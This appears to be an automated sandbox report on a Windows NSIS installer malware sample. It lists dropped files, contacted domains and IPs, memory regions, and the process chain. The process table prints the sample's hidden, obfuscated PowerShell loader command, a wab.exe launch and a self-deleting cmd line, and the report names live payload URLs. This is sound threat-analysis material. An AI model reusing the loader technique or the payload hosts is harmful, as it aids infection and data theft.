Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Fordybendes.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\Statsskattedepartement.Und
|
ASCII text, with very long lines (54997), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\sitre\Fordybendes.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\sitre\Fordybendes.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\47105159387173330903812.tmp
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie
0xb, schema 4, UTF-8, version-valid-for 1
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-console-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-datetime-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-debug-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-errorhandling-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-file-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-file-l1-2-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-file-l2-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-handle-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-heap-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-interlocked-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-libraryloader-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-localization-l1-2-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-memory-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-namedpipe-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-processenvironment-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-processthreads-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-processthreads-l1-1-1.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-profile-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-rtlsupport-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-string-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-synch-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-synch-l1-2-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-sysinfo-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-timezone-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-core-util-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-conio-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-convert-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-environment-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-filesystem-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-heap-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-locale-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-math-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-multibyte-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-private-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-process-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-runtime-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-stdio-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-string-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-time-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\api-ms-win-crt-utility-l1-1-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\freebl3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\mozglue.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\msvcp140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\nss3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\nssdbm3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\softokn3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\ucrtbase.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\50C257A1\vcruntime140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dr4izjnw.yxy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rftdppn2.4yh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\Gate.pri
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\sitre\egenpensionernes.hjo
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\sitre\knudepunktstrafikken.sma
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\sitre\rustendes.ass
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\sitre\tevarmere.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\sitre\unanachronistically.pre
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Nummerbetegnelser.Til
|
data
|
dropped
|
There are 53 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Fordybendes.exe
|
"C:\Users\user\Desktop\Fordybendes.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Cardinalfishes=Get-Content 'C:\Users\user\AppData\Local\stagnantness\topchef\Fletcher\Fiskestimes\Statsskattedepartement.Und';$Ventricolumnar=$Cardinalfishes.SubString(54973,3);.$Ventricolumnar($Cardinalfishes)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "wab.exe"
|
|
|
|
C:\Windows\SysWOW64\timeout.exe
|
C:\Windows\system32\timeout.exe 3
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://d4hk.shop/DL341/index.php
|
188.114.96.3
|
|
|
|
https://kenkyo.x24.eu/wp-includes/ipfrjK171.bin
|
5.255.110.9
|
|
|
|
https://kenkyo.x24.eu/KW/
|
unknown
|
|
|
|
https://kenkyo.x24.eu/wp-includes/ipfrjK171.binPW
|
unknown
|
|
|
|
https://kenkyo.x24.eu/wp-includes/ipfrjK171.binnW
|
unknown
|
|
|
|
https://kenkyo.x24.eu/
|
unknown
|
|
|
|
https://kenkyo.x24.eu/wp-includes/ipfrjK171.binYW
|
unknown
|
|
|
|
https://kenkyo.x24.eu/V
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.mozilla.com/en-US/blocklist/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://ocsp.thawte.com0
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.mozilla.com0
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://d4hk.shop/
|
unknown
|
||
|
http://d4hk.shop/DL341/index.phpmR
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
|
http://d4hk.shop/DL341/index.phpDSU
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
d4hk.shop
|
188.114.96.3
|
|
|
|
kenkyo.x24.eu
|
5.255.110.9
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
d4hk.shop
|
European Union
|
|
|
|
5.255.110.9
|
kenkyo.x24.eu
|
Netherlands
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
B3AD000
|
direct allocation
|
page execute and read and write
|
|
|
|
81D0000
|
heap
|
page execute and read and write
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
2E20000
|
direct allocation
|
page read and write
|
||
|
2FB8000
|
heap
|
page read and write
|
||
|
8DA0000
|
heap
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
89E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27F2000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
24FDE000
|
stack
|
page read and write
|
||
|
9AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
253B0000
|
direct allocation
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
5E0F000
|
trusted library allocation
|
page read and write
|
||
|
251C8000
|
direct allocation
|
page read and write
|
||
|
251C0000
|
direct allocation
|
page read and write
|
||
|
2AD7000
|
stack
|
page read and write
|
||
|
26701000
|
heap
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page execute and read and write
|
||
|
9870000
|
trusted library allocation
|
page read and write
|
||
|
2230000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
819D000
|
trusted library allocation
|
page read and write
|
||
|
251C8000
|
direct allocation
|
page read and write
|
||
|
4928000
|
trusted library allocation
|
page read and write
|
||
|
9790000
|
trusted library allocation
|
page read and write
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
2F83000
|
trusted library allocation
|
page read and write
|
||
|
88C0000
|
trusted library allocation
|
page read and write
|
||
|
9B2B000
|
heap
|
page read and write
|
||
|
9850000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
8CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
262D0000
|
direct allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
433000
|
unkown
|
page readonly
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
8ADE000
|
heap
|
page read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
8CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
2FA5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
25120000
|
remote allocation
|
page read and write
|
||
|
4B5F000
|
heap
|
page read and write
|
||
|
251D8000
|
direct allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
2FD0000
|
trusted library allocation
|
page read and write
|
||
|
25204000
|
direct allocation
|
page read and write
|
||
|
99DE000
|
stack
|
page read and write
|
||
|
8A10000
|
trusted library allocation
|
page read and write
|
||
|
9B24000
|
heap
|
page read and write
|
||
|
251C0000
|
direct allocation
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
256C0000
|
direct allocation
|
page read and write
|
||
|
9CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F90000
|
trusted library allocation
|
page read and write
|
||
|
2E40000
|
direct allocation
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
8DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D20000
|
heap
|
page read and write
|
||
|
3081000
|
heap
|
page read and write
|
||
|
250BD000
|
stack
|
page read and write
|
||
|
980D000
|
stack
|
page read and write
|
||
|
9A56000
|
heap
|
page read and write
|
||
|
2E00000
|
direct allocation
|
page read and write
|
||
|
9D70000
|
trusted library allocation
|
page read and write
|
||
|
6EF5000
|
heap
|
page execute and read and write
|
||
|
98E0000
|
trusted library allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
2F60000
|
trusted library allocation
|
page read and write
|
||
|
25238000
|
direct allocation
|
page read and write
|
||
|
86C6000
|
trusted library allocation
|
page read and write
|
||
|
80A2000
|
trusted library allocation
|
page read and write
|
||
|
9957000
|
heap
|
page read and write
|
||
|
7367000
|
heap
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
9A70000
|
heap
|
page read and write
|
||
|
254D0000
|
direct allocation
|
page read and write
|
||
|
251D4000
|
direct allocation
|
page read and write
|
||
|
252C0000
|
direct allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
8CE0000
|
trusted library allocation
|
page read and write
|
||
|
2E70000
|
direct allocation
|
page read and write
|
||
|
8CC0000
|
trusted library allocation
|
page read and write
|
||
|
49BD000
|
stack
|
page read and write
|
||
|
999B000
|
stack
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
8D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
8AC0000
|
heap
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
7F8C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
9AD0000
|
heap
|
page read and write
|
||
|
2F50000
|
trusted library section
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
2F7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A40000
|
direct allocation
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
9D40000
|
trusted library allocation
|
page read and write
|
||
|
21FE000
|
stack
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
8960000
|
trusted library allocation
|
page read and write
|
||
|
8667000
|
trusted library allocation
|
page read and write
|
||
|
80A4000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
24A30000
|
direct allocation
|
page read and write
|
||
|
76E000
|
stack
|
page read and write
|
||
|
5E17000
|
trusted library allocation
|
page read and write
|
||
|
6E9F000
|
stack
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
9890000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
25504000
|
direct allocation
|
page read and write
|
||
|
B230000
|
direct allocation
|
page execute and read and write
|
||
|
251F0000
|
direct allocation
|
page read and write
|
||
|
8DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
48DE000
|
stack
|
page read and write
|
||
|
252D4000
|
direct allocation
|
page read and write
|
||
|
25B50000
|
direct allocation
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
255F4000
|
direct allocation
|
page read and write
|
||
|
8AB0000
|
heap
|
page read and write
|
||
|
8D60000
|
trusted library allocation
|
page read and write
|
||
|
8DC0000
|
trusted library allocation
|
page read and write
|
||
|
24EAD000
|
stack
|
page read and write
|
||
|
262D0000
|
direct allocation
|
page read and write
|
||
|
2E50000
|
direct allocation
|
page read and write
|
||
|
9D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F70000
|
trusted library allocation
|
page read and write
|
||
|
425000
|
unkown
|
page read and write
|
||
|
88D0000
|
trusted library allocation
|
page read and write
|
||
|
25278000
|
direct allocation
|
page read and write
|
||
|
8199000
|
trusted library allocation
|
page read and write
|
||
|
497C000
|
stack
|
page read and write
|
||
|
25300000
|
direct allocation
|
page read and write
|
||
|
6DE0000
|
trusted library allocation
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
2E30000
|
direct allocation
|
page read and write
|
||
|
81C0000
|
trusted library allocation
|
page read and write
|
||
|
9880000
|
trusted library allocation
|
page execute and read and write
|
||
|
22A0000
|
heap
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
422000
|
unkown
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
5DA1000
|
trusted library allocation
|
page read and write
|
||
|
25FA0000
|
direct allocation
|
page read and write
|
||
|
307B000
|
heap
|
page read and write
|
||
|
25120000
|
remote allocation
|
page read and write
|
||
|
253B0000
|
direct allocation
|
page read and write
|
||
|
6E00000
|
trusted library allocation
|
page read and write
|
||
|
2543C000
|
direct allocation
|
page read and write
|
||
|
9AD9000
|
heap
|
page read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
42A000
|
unkown
|
page read and write
|
||
|
8A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
70C000
|
stack
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
255F0000
|
direct allocation
|
page read and write
|
||
|
25550000
|
direct allocation
|
page read and write
|
||
|
2C2B000
|
heap
|
page read and write
|
||
|
9CF0000
|
trusted library allocation
|
page read and write
|
||
|
8DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
8196000
|
trusted library allocation
|
page read and write
|
||
|
8C60000
|
trusted library allocation
|
page read and write
|
||
|
8100000
|
trusted library allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
86E000
|
heap
|
page read and write
|
||
|
8930000
|
trusted library allocation
|
page read and write
|
||
|
97A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
253B0000
|
direct allocation
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
8D30000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
5F3E000
|
trusted library allocation
|
page read and write
|
||
|
8770000
|
trusted library allocation
|
page execute and read and write
|
||
|
2507D000
|
stack
|
page read and write
|
||
|
262E0000
|
direct allocation
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
9AC7000
|
heap
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
24A50000
|
direct allocation
|
page read and write
|
||
|
25550000
|
direct allocation
|
page read and write
|
||
|
9AB3000
|
heap
|
page read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A30000
|
trusted library allocation
|
page read and write
|
||
|
8A57000
|
heap
|
page read and write
|
||
|
8800000
|
trusted library allocation
|
page read and write
|
||
|
251E0000
|
direct allocation
|
page read and write
|
||
|
2220000
|
heap
|
page read and write
|
||
|
46A0000
|
heap
|
page read and write
|
||
|
7020000
|
direct allocation
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
9A05000
|
trusted library allocation
|
page read and write
|
||
|
7DDD000
|
remote allocation
|
page execute and read and write
|
||
|
5F53000
|
trusted library allocation
|
page read and write
|
||
|
5CE000
|
stack
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
7B98000
|
trusted library allocation
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
300B000
|
heap
|
page read and write
|
||
|
8C40000
|
trusted library allocation
|
page read and write
|
||
|
2E60000
|
direct allocation
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
8900000
|
trusted library allocation
|
page read and write
|
||
|
251E0000
|
direct allocation
|
page read and write
|
||
|
9B27000
|
heap
|
page read and write
|
||
|
89F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B73000
|
trusted library allocation
|
page read and write
|
||
|
251BC000
|
direct allocation
|
page read and write
|
||
|
103AD000
|
direct allocation
|
page execute and read and write
|
||
|
27FC000
|
heap
|
page read and write
|
||
|
3083000
|
heap
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page execute and read and write
|
||
|
55DD000
|
remote allocation
|
page execute and read and write
|
||
|
2E10000
|
direct allocation
|
page read and write
|
||
|
9B2C000
|
heap
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
B3E000
|
unkown
|
page read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
9AD9000
|
heap
|
page read and write
|
||
|
6DF0000
|
trusted library allocation
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
491E000
|
stack
|
page read and write
|
||
|
9950000
|
heap
|
page read and write
|
||
|
8AC9000
|
heap
|
page read and write
|
||
|
D1AD000
|
direct allocation
|
page execute and read and write
|
||
|
251D0000
|
direct allocation
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
2E90000
|
direct allocation
|
page read and write
|
||
|
EFAD000
|
direct allocation
|
page execute and read and write
|
||
|
251B8000
|
direct allocation
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
86E000
|
heap
|
page read and write
|
||
|
251BC000
|
direct allocation
|
page read and write
|
||
|
7010000
|
direct allocation
|
page read and write
|
||
|
7DE0000
|
trusted library allocation
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
24A40000
|
direct allocation
|
page read and write
|
||
|
4880000
|
heap
|
page readonly
|
||
|
86E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
91DD000
|
remote allocation
|
page execute and read and write
|
||
|
2F73000
|
trusted library allocation
|
page execute and read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
9A50000
|
trusted library allocation
|
page read and write
|
||
|
4060000
|
remote allocation
|
page execute and read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
251F0000
|
direct allocation
|
page read and write
|
||
|
8084000
|
trusted library allocation
|
page read and write
|
||
|
81B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
86B000
|
heap
|
page read and write
|
||
|
8A5D000
|
heap
|
page read and write
|
||
|
98F0000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
trusted library section
|
page read and write
|
||
|
251B8000
|
direct allocation
|
page read and write
|
||
|
25464000
|
direct allocation
|
page read and write
|
||
|
856000
|
heap
|
page read and write
|
||
|
49E0000
|
trusted library allocation
|
page read and write
|
||
|
26701000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
72B0000
|
heap
|
page read and write
|
||
|
4DA1000
|
trusted library allocation
|
page read and write
|
||
|
E5AD000
|
direct allocation
|
page execute and read and write
|
||
|
24A70000
|
direct allocation
|
page read and write
|
||
|
5E13000
|
trusted library allocation
|
page read and write
|
||
|
9A10000
|
direct allocation
|
page read and write
|
||
|
9AE6000
|
heap
|
page read and write
|
||
|
251B4000
|
direct allocation
|
page read and write
|
||
|
88F0000
|
trusted library allocation
|
page read and write
|
||
|
252C8000
|
direct allocation
|
page read and write
|
||
|
6DE3000
|
trusted library allocation
|
page read and write
|
||
|
84D000
|
heap
|
page read and write
|
||
|
24F2D000
|
stack
|
page read and write
|
||
|
2C42000
|
heap
|
page read and write
|
||
|
9A20000
|
direct allocation
|
page read and write
|
||
|
8750000
|
trusted library allocation
|
page read and write
|
||
|
26EF000
|
stack
|
page read and write
|
||
|
B4F000
|
stack
|
page read and write
|
||
|
252B0000
|
direct allocation
|
page read and write
|
||
|
9A78000
|
heap
